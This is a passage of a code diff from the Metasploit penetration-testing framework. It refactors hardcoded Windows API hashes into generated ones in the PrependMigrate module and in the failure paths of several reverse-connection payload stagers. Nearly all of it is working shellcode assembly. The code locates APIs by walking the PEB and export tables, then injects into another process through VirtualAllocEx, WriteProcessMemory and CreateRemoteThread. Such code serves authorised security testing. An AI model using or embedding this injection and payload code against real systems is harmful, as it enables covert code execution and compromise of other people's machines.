+      push #{Rex::Text.block_api_hash("kernel32.dll", "CreateRemoteThread")} ; hash( "kernel32.dll", "CreateRemoteThread" )
      call ebp                  ; CreateRemoteThread( ...);

      #{exitblock}              ; jmp to exitfunc or long sleep
@@ -306,109 +236,39 @@ module Msf::Payload::Windows::PrependMigrate
    block_api_start = <<-EOS
      call start
    EOS
-    block_api_asm = <<-EOS
-    api_call:
-      push r9                  ; Save the 4th parameter
-      push r8                  ; Save the 3rd parameter
-      push rdx                 ; Save the 2nd parameter
-      push rcx                 ; Save the 1st parameter
-      push rsi                 ; Save RSI
-      xor rdx, rdx             ; Zero rdx
-      mov rdx, [gs:rdx+96]     ; Get a pointer to the PEB
-      mov rdx, [rdx+24]        ; Get PEB->Ldr
-      mov rdx, [rdx+32]        ; Get the first module from the InMemoryOrder module list
-    next_mod:                  ;
-      mov rsi, [rdx+80]        ; Get pointer to modules name (unicode string)
-      movzx rcx, word [rdx+74] ; Set rcx to the length we want to check
-      xor r9, r9               ; Clear r9 which will store the hash of the module name
-    loop_modname:              ;
-      xor rax, rax             ; Clear rax
-      lodsb                    ; Read in the next byte of the name
-      cmp al, 'a'              ; Some versions of Windows use lower case module names
-      jl not_lowercase         ;
-      sub al, 0x20             ; If so normalise to uppercase
-    not_lowercase:             ;
-      ror r9d, 13              ; Rotate right our hash value
-      add r9d, eax             ; Add the next byte of the name
-      loop loop_modname        ; Loop until we have read enough
-      ; We now have the module hash computed
-      push rdx                 ; Save the current position in the module list for later
-      push r9                  ; Save the current module hash for later
-      ; Proceed to iterate the export address table
-      mov rdx, [rdx+32]        ; Get this modules base address
-      mov eax, dword [rdx+60]  ; Get PE header
-      add rax, rdx             ; Add the modules base address
-      mov eax, dword [rax+136] ; Get export tables RVA
-      test rax, rax            ; Test if no export address table is present
-      jz get_next_mod1         ; If no EAT present, process the next module
-      add rax, rdx             ; Add the modules base address
-      push rax                 ; Save the current modules EAT
-      mov ecx, dword [rax+24]  ; Get the number of function names
-      mov r8d, dword [rax+32]  ; Get the rva of the function names
-      add r8, rdx              ; Add the modules base address
-      ; Computing the module hash + function hash
-    get_next_func:             ;
-      jecxz get_next_mod       ; When we reach the start of the EAT (we search backwards), process the next module
-      dec rcx                  ; Decrement the function name counter
-      mov esi, dword [r8+rcx*4]; Get rva of next module name
-      add rsi, rdx             ; Add the modules base address
-      xor r9, r9               ; Clear r9 which will store the hash of the function name
-      ; And compare it to the one we want
-    loop_funcname:             ;
-      xor rax, rax             ; Clear rax
-      lodsb                    ; Read in the next byte of the ASCII function name
-      ror r9d, 13              ; Rotate right our hash value
-      add r9d, eax             ; Add the next byte of the name
-      cmp al, ah               ; Compare AL (the next byte from the name) to AH (null)
-      jne loop_funcname        ; If we have not reached the null terminator, continue
-      add r9, [rsp+8]          ; Add the current module hash to the function hash
-      cmp r9d, r10d            ; Compare the hash to the one we are searchnig for
-      jnz get_next_func        ; Go compute the next function hash if we have not found it
-      ; If found, fix up stack, call the function and then value else compute the next one...
-      pop rax                  ; Restore the current modules EAT
-      mov r8d, dword [rax+36]  ; Get the ordinal table rva
-      add r8, rdx              ; Add the modules base address
-      mov cx, [r8+2*rcx]       ; Get the desired functions ordinal
-      mov r8d, dword [rax+28]  ; Get the function addresses table rva
-      add r8, rdx              ; Add the modules base address
-      mov eax, dword [r8+4*rcx]; Get the desired functions RVA
-      add rax, rdx             ; Add the modules base address to get the functions actual VA
-      ; We now fix up the stack and perform the call to the drsired function...
-    finish:
-      pop r8                   ; Clear off the current modules hash
-      pop r8                   ; Clear off the current position in the module list
-      pop rsi                  ; Restore RSI
-      pop rcx                  ; Restore the 1st parameter
-      pop rdx                  ; Restore the 2nd parameter
-      pop r8                   ; Restore the 3rd parameter
-      pop r9                   ; Restore the 4th parameter
-      pop r10                  ; pop off the return address
-      sub rsp, 32              ; reserve space for the four register params (4 * sizeof(QWORD) = 32)
-                               ; It is the callers responsibility to restore RSP if need be (or alloc more space or align RSP).
-      push r10                 ; push back the return address
-      jmp rax                  ; Jump into the required function
-      ; We now automagically return to the correct caller...
-    get_next_mod:              ;
-      pop rax                  ; Pop off the current (now the previous) modules EAT
-    get_next_mod1:             ;
-      pop r9                   ; Pop off the current (now the previous) modules hash
-      pop rdx                  ; Restore our position in the module list
-      mov rdx, [rdx]           ; Get the next module
-      jmp next_mod             ; Process this module
-    EOS
+    block_api_obj = Object.new.extend(Msf::Payload::Windows::BlockApi_x64)
+    block_api_asm = block_api_obj.asm_block_api

    # Prepare default exit block (sleep for a long long time)
    exitblock = <<-EOS
      ;sleep
      xor rcx,rcx
      dec rcx                   ; rcx = -1
-      mov r10d, 0xE035F044      ; hash( "kernel32.dll", "Sleep" )
+      mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "Sleep")}      ; hash( "kernel32.dll", "Sleep" )
      call rbp                  ; Sleep( ... );
    EOS

+    exitfunc_block_asm = %Q^
+    exitfunk:
+      mov ebx, #{Rex::Text.block_api_hash("kernel32.dll", "ExitThread")}   ; The EXITFUNK as specified by user...
+      mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "GetVersion")}  ; hash( "kernel32.dll", "GetVersion" )
+      call rbp              ; GetVersion(); (AL will = major version and AH will = minor version)
+      add rsp, 40           ; cleanup the default param space on stack
+      cmp al, 0x6           ; If we are not running on Windows Vista, 2008 or 7
+      jl goodbye            ; Then just call the exit function...
+      cmp bl, 0xE0          ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
+      jne goodbye           ;
+      mov ebx, #{Rex::Text.block_api_hash("ntdll.dll", "RtlExitUserThread")}   ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
+    goodbye:                ; We now perform the actual call to the exit function
+      push 0x0              ;
+      pop rcx               ; set the exit function parameter
+      mov r10d, ebx         ; place the correct EXITFUNK into r10d
+      call rbp              ; call EXITFUNK( 0 );
+    ^
    # Check to see if we can find x64 exitfunc in the payload
-    exitfunc_index = buf.index("\x41\xBA\xA6\x95\xBD\x9D\xFF\xD5\x48\x83\xC4\x28\x3C\x06" +
-        "\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x59\x41\x89\xDA\xFF\xD5")
+    
+    exitfunc_block_blob = Metasm::Shellcode.assemble(Metasm::X64.new, exitfunc_block_asm).encode_string
+    exitfunc_index = buf.index(exitfunc_block_blob)
    if exitfunc_index
      exitblock_offset = "0x%04x + payload - exitblock" % (exitfunc_index - 5)
      exitblock = "exitblock:\njmp $+#{exitblock_offset}"
@@ -451,7 +311,7 @@ module Msf::Payload::Windows::PrependMigrate
      ; get our own startupinfo at esp+0x60
      add rsp,-400              ; adjust the stack to avoid corruption
      lea rcx,[rsp+0x30]
-      mov r10d, 0xB16B4AB1      ; hash( "kernel32.dll", "GetStartupInfoA" )
+      mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "GetStartupInfoA")}       ; hash( "kernel32.dll", "GetStartupInfoA" )
      call rbp                  ; GetStartupInfoA( &si );

      jmp getcommand
@@ -473,7 +333,7 @@ module Msf::Payload::Windows::PrependMigrate
      mov r8, rcx               ; lpProcessAttributes
      mov rdx, rsi              ; lpCommandLine
      ; rcx is already zero     ; lpApplicationName
-      mov r10d, 0x863FCC79      ; hash( "kernel32.dll", "CreateProcessA" )
+      mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "CreateProcessA")}      ; hash( "kernel32.dll", "CreateProcessA" )
      call rbp                  ; CreateProcessA( &si );

      ; if we didn't get a new process, use this one
@@ -503,7 +363,7 @@ module Msf::Payload::Windows::PrependMigrate
    migrate_asm << <<-EOS
      xor rdx,rdx               ; address
      mov rcx, [rdi]            ; handle
-      mov r10d, 0x3F9287AE      ; hash( "kernel32.dll", "VirtualAllocEx" )
+      mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "VirtualAllocEx")}       ; hash( "kernel32.dll", "VirtualAllocEx" )
      call rbp                  ; VirtualAllocEx( ...);

      ; eax now contains the destination - save in ebx
@@ -517,7 +377,7 @@ module Msf::Payload::Windows::PrependMigrate
      pop r8                    ; lpBuffer
      mov rdx, rax              ; lpBaseAddress
      mov rcx, [rdi]            ; hProcess
-      mov r10d, 0xE7BDD8C5      ; hash( "kernel32.dll", "WriteProcessMemory" )
+      mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "WriteProcessMemory")}      ; hash( "kernel32.dll", "WriteProcessMemory" )
      call rbp                  ; WriteProcessMemory( ...);

      ; run the code (CreateRemoteThread())
@@ -529,7 +389,7 @@ module Msf::Payload::Windows::PrependMigrate
      mov r8, rcx               ; stacksize
      ;rdx already equals 0     ; lpThreadAttributes
      mov rcx, [rdi]
-      mov r10d, 0x799AACC6      ; hash( "kernel32.dll", "CreateRemoteThread" )
+      mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "CreateRemoteThread")}      ; hash( "kernel32.dll", "CreateRemoteThread" )
      call rbp                  ; CreateRemoteThread( ...);

      #{exitblock}              ; jmp to exitfunc or long sleep
@@ -442,7 +442,7 @@ module Payload::Windows::ReverseHttp
    else
      asm << %Q^
    failure:
-      push 0x56A2B5F0        ; hardcoded to exitprocess for size
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
      call ebp
      ^
    end
@@ -147,7 +147,7 @@ module Payload::Windows::ReverseNamedPipe
    else
      asm << %Q^
      failure:
-        push 0x56A2B5F0         ; hardcoded to exitprocess for size
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
        call ebp
      ^
    end
@@ -201,7 +201,7 @@ module Payload::Windows::ReverseTcp
    else
      asm << %Q^
      failure:
-        push 0x56A2B5F0         ; hardcoded to exitprocess for size
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
        call ebp
      ^
    end
@@ -142,7 +142,7 @@ module Payload::Windows::ReverseTcpDns
    else
      asm << %Q^
      failure:
-        push 0x56A2B5F0         ; hardcoded to exitprocess for size
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
        call ebp
      ^
    end
--- a/Show More
+++ b/Show More